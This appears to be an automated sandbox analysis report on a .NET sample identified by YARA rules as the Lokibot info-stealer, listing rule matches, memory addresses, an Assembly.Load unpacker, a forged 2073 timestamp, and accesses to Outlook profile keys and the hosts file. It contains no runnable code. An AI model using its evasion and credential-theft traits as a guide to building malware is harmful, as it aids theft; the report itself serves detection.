                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_017BC1340_2_017BC134
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_017BE5780_2_017BE578
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_017BE56A0_2_017BE56A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC4BA20_2_07AC4BA2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC5F280_2_07AC5F28
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC5F380_2_07AC5F38
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC10C70_2_07AC10C7
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 0_2_07AC10D80_2_07AC10D8
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_0040549C1_2_0040549C
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_004029D41_2_004029D4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: String function: 0041219C appears 45 times
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: String function: 00405B6F appears 42 times
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000000.341178882.0000000000F66000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamed~ vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.369734521.0000000007840000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_rc.dllT vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.363844302.0000000003341000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameB2B.exe4 vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000000.00000002.369816224.00000000078F0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMARCUS.dll4 vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, 00000001.00000000.360680580.0000000000986000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamed~ vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeBinary or memory string: OriginalFilenamed~ vs SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe
                    Source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@247/2
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,1_2_0040650A
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,1_2_0040434D
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeVirustotal: Detection: 39%
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeReversingLabs: Detection: 20%
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeString found in binary or memory: "/Added title with ID {0}-Deleted title with ID +Loaded title with ID GCould not find title with entry {0}
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe'
                    Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe {path}
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe {path}Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation:

                    barindex
                    .NET source code contains potential unpackerShow sources
                    Source: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe, StoreManagmentSystem/FormStart.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.0.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.ec0000.0.unpack, StoreManagmentSystem/FormStart.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 0.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.ec0000.0.unpack, StoreManagmentSystem/FormStart.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.8e0000.1.unpack, StoreManagmentSystem/FormStart.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Source: 1.0.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.8e0000.0.unpack, StoreManagmentSystem/FormStart.cs.Net Code: dddddddddddd System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                    Binary contains a suspicious time stampShow sources
                    Source: initial sampleStatic PE information: 0xC1FEB99E [Sun Feb 19 02:19:10 2073 UTC]
                    Yara detected aPLib compressed binaryShow sources
                    Source: Yara matchFile source: 00000000.00000002.363916312.00000000033BD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.607379742.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.364641317.0000000004341000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 7108, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe PID: 4852, type: MEMORY
                    Source: Yara matchFile source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AD4
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeCode function: 1_2_00402AC0 push eax; ret 1_2_00402AFC
                    Source: initial sampleStatic PE information: section name: .text entropy: 7.85676588796
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Heur.MSIL.Burkina.1.19357.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
